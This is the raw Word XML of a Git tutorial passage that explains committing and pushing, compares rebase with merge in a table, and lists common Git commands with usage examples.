      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>all changes</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (modified and new files) at once, you can use:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304729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3506747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Commit the Changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53ADADA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Once you’ve staged your changes, you can commit them to your local repository. The commit will capture the current state of your files, along with a message describing the changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EBA5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Your commit message"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133EC4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69F890E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Added new feature to improve user experience"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FDC656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Push the Commit to a Remote Repository</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452B1F0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push your local commits to a remote repository (e.g., GitHub, GitLab), you need to use the git push command. Ensure you're pushing to the correct branch (usually main or master):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2252E84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lt;branch_name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A69C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push changes to the main branch:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD8563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3970DF2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Pull Changes (Optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2E1D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fore pushing your changes, it's a good practice to pull the latest changes from the remote repository to ensure you’re not overwriting anyone else's work. Use:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163E2A5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lt;branch_name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EB3C5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0077F0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1452AFE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a Full Workflow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4333E4E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Modify your files (e.g., add a new feature or fix a bug).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E0392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 the status:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFE8D1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1C77EDC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tage the changes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEA6C4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1F497A8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mmit the changes with a meaningful message:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60ED40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Fixed bug in user registration"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D599A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ll the latest changes from the remote repository (if necessary):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0573D5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47D981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sh the changes to the remote repository:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E53812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648ED6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y following these steps, you'll successfully commit your changes to your local Git repository and push them to the remote repository.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DD2C23" w14:textId="5BF7DE72"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596" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EFD029" w14:textId="124CFE7B" w:rsidR="00D70F52" w:rsidRPr="00CE4B95" w:rsidRDefault="001D1EE4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="889" w:name="_Toc197868103"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between rebase and merge</w:t>
      </w:r>
      <w:r w:rsidR="00D70F52" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="889"/>
    </w:p>
    <w:p w14:paraId="4DC05133" w14:textId="05A3774C"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 xml:space="preserve"> are both used to integrate changes from one branch into another, but they do so in different ways. Here's a breakdown of the differences between the two:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F7ECF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merge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7349A4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erges the changes from one branch into another, creating a new merge commit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B296F6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2FA2D8D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hen you use git merge, Git will combine the changes from the source branch into the target branch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1565B30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is creates a </w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>merge commit</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the target branch that has two parent commits: one from the target branch and one from the source branch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799113B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 does not modify the history of either branch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DAE31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2EBFAC8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history is preserved as is, with a merge commit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4A315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The commit history shows when the merge occurred and keeps all commits from both branches.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5404A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ypically used when you want to preserve the history of both branches.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4143C5B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60052D7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main branch and want to merge changes from the feature branch:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41AEE1B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6D16D4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1FE3C9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A new commit is created that integrates the changes from feature into main. The commit history will show a "merge" event.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B19124"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F7120">
          <v:rect id="_x0000_i3597" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3719D21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rebase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749CB4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oves or applies commits from one branch onto another, rewriting the commit history.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACB9E9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308F258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ith git rebase, Git takes the changes from the source branch and "re-applies" them on top of the target branch, as though the changes were made sequentially.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9F6163"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t </w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>rewrites</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the commit history by moving the base of the source branch to the target branch, resulting in a linear history.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43681FC1"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 Instead, the changes are added as if they were part of the target branch all along.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9714A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1AFFB624"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commit history will be linear, and there won't be any extra merge commit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFB3F6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is useful when you want to keep the history clean, as if the changes were made directly on top of the base branch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BBE7FF"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2EC007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feature branch and want to rebase it onto main:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EB34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354240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49A4956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The feature branch commits are moved on top of the main branch commits, making the history linear.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A054E57"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43D2FC">
          <v:rect id="_x0000_i3598" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="489B2D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3682"/>
        <w:gridCol w:w="5111"/>
      </w:tblGrid>
      <w:tr w:rsidR="00324FFB" w:rsidRPr="00324FFB" w14:paraId="7C4A5B4F" w14:textId="77777777" w:rsidTr="00CA2729">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="043FCFE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Aspect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F16881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merge</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E707BC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rebase</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00324FFB" w:rsidRPr="00324FFB" w14:paraId="358527F2" w14:textId="77777777" w:rsidTr="00CA2729">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B9DDE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istory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="027B6C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s a merge commit; history is preserved.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="540A98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results in a linear history.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00324FFB" w:rsidRPr="00324FFB" w14:paraId="1A2DC1FD" w14:textId="77777777" w:rsidTr="00CA2729">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="505A43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e Commit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31E82E5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es, a merge commit is created.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3345DCA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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00324FFB" w:rsidRPr="00324FFB" w14:paraId="3D411F50" w14:textId="77777777" w:rsidTr="00CA2729">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6877D4E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Conflicts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="582FCB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need to be resolved once, then commit.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3CAC6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may need to be resolved for each commit.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00324FFB" w:rsidRPr="00324FFB" w14:paraId="36742362" w14:textId="77777777" w:rsidTr="00CA2729">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="065B1F2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Workflow</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="70C6BB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impler; works well for integrating long-running branches.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1315629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leaner history; better for smaller, more isolated feature branches.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00324FFB" w:rsidRPr="00324FFB" w14:paraId="7BD1B657" w14:textId="77777777" w:rsidTr="00CA2729">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="207E28F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writing History</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22F749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Does not rewrite history.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03C01A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makes the history look like the commits were made sequentially.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00324FFB" w:rsidRPr="00324FFB" w14:paraId="6210BC86" w14:textId="77777777" w:rsidTr="00CA2729">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="374D0F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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2256CC0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preserve the branch history.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76DEF2A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create a clean, linear history.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="371D4D4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When to Use Each:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2971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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FA18F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to preserve the full history, especially for long-running branches or when you want to keep the context of how and when features were merged.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9C9AF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s safer for public/shared branches since it doesn’t rewrite history.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F1CA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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EE8E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a clean, linear history without merge commits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E885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deal for feature branches before merging into the main branch to keep the commit history clean.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24618F3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 careful when rebasing public/shared branches because it rewrites commit history.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC116D6"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1D8DA">
          <v:rect id="_x0000_i3599" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0395FD5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Scenarios:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C25A8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ing a feature branch into the main branch</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC426F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After finishing the feature, use git merge to combine the feature with the main branch. This will create a merge commit that shows when the feature was integrated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F18E9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basing a feature branch onto the latest main</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B10DC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8EBBB">
          <v:rect id="_x0000_i3600" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5711F07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Rebase vs. Merge:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66420F3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Merge Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4EAD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58748F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0AAA947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Merge commit appears in the history.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0EF0C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Rebase Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5138B2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0719448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6F673F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Feature branch commits are re-applied on top of main, resulting in a cleaner history without a merge commit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F02B91"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811D0">
          <v:rect id="_x0000_i3601" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C441C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602" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="688EDD98" w14:textId="07E5CEBF" w:rsidR="00D70F52" w:rsidRPr="00CE4B95" w:rsidRDefault="001F0846">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="890" w:name="_Toc197868104"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain a Git commands</w:t>
      </w:r>
      <w:r w:rsidR="00D70F52" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="890"/>
    </w:p>
    <w:p w14:paraId="25489B5B" w14:textId="2A4BEC33"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Here’s a detailed explanation of some commonly used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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7CB3C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init</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640980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Initializes a new Git repository in your current directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8A28D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run this command inside a project folder to start using Git with that project.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4D70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init</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BED919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clone</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F6FF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copy of a remote repository on your local machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C44E0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lone an existing repository from a remote source (e.g., GitHub).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F17DB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one https://github.com/username/repository.git</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796FB68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git status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBB5B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urrent state of your working directory and staging area.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BE796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tells you which files are staged for the next commit, which files have been modified, and which are untracked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514456C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45C1315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git add</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8F6AF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dds files to the staging area, preparing them for a commit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0675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need to specify which files to add, or use . to add all modified files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECACA3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file1.txt         # Adds a specific file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44BD868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                 # Adds all changes in the current directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DE2F4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git commit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C868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cords the changes in the staging area to the repository.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5F8DB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adding changes, use git commit to save them to the repository’s history. Always include a meaningful commit message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42CC6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Commit message"     # Commit with a message</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3721024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6. git push</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08617A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ploads your local commits to a remote repository (e.g., GitHub, GitLab).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA700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committing changes locally, push those changes to the remote branch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B9356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     # Pushes changes to the 'main' branch on remote repository</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6743A6D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7. git pull</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29642C7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a remote repository and merges them into your current branch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030AD17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d to update your local repository with the latest changes from the remote.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511160F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pull origin main     # Pulls changes from the 'main' branch on the remote repository</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C2F00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8. git fetch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7F21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the remote repository but doesn’t merge them. This allows you to check for updates without modifying your local working directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473F6B9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typically used before performing a git merge or git rebase.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671059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fetch origin         # Fetches changes from the 'origin' remote repository</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793ADA5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9. git merge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D6E2C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ombines the changes from one branch into another.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC75F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switching to the target branch, use git merge to integrate another branch's changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAACF2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branch     # Merges the changes from 'feature-branch' into the current branch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DA57A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0. git branch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2461499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Lists all branches in the repository, or creates and deletes branches.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4351920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helps you create, list, or delete branches.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5C04C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 Lists all branches</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042F8E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new-branch     # Creates a new branch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6B261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d old-branch # Deletes a branch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA0B4A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1. git checkout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3FD11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witches between branches or restores files to their last committed state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37448E4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this command to switch to another branch or revert a file to a previous state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C134B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  # Switch to 'feature-branch'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B569E4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ile1.txt       # Revert 'file1.txt' to the last committed version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75029ED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2. git log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0094C65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ommit history of the repository.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668909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displays the commit history along with commit IDs, messages, and timestamps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3239ED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 Shows a detailed log of all commits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7354CC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oneline     # Shows a compact log with one line per commit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1740B1A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3. git reset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27EC3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nstages changes or resets the commit history to a specific state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4F923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it to undo changes or reset to a particular commit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03AA215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EAD file1.txt       # Unstages 'file1.txt' from the staging area</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CD4DF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ard commit_id     # Resets your local branch to a specific commit (WARNING: This will delete uncommitted changes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F34A3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4. git rebase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3181482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applies commits from one branch onto another, rewiring history to create a linear progression.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B9316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often used to make your feature branch up-to-date with the base branch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A9B3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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5753847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3A0D256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5. git stash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2561341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Temporarily saves uncommitted changes, allowing you to switch branches or perform other tasks without losing your work.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D18355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stash your changes, switch branches, and apply the stash later.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C416E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 Stashes your changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AFD8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apply      # Applies the most recent stash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4214D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pop        # Applies the most recent stash and removes it from the stash list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3511D1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6. git tag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B153D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reference to a specific commit, typically used to mark releases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EA27C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reate annotated or lightweight tags to mark important points in your project’s history.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A052B3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v1.0               # Creates a lightweight tag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035733E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a v1.0 -m "First release"  # Creates an annotated tag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436FA9E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7. git diff</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD582C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differences between your working directory and the last commit, or between two commits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73068B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to see what has changed in your files before committing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D21548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 Shows changes between working directory and staging area</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B3D7D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commit_id1 commit_id2    # Shows differences between two commits</w:t>
      </w:r>
    </w:p>
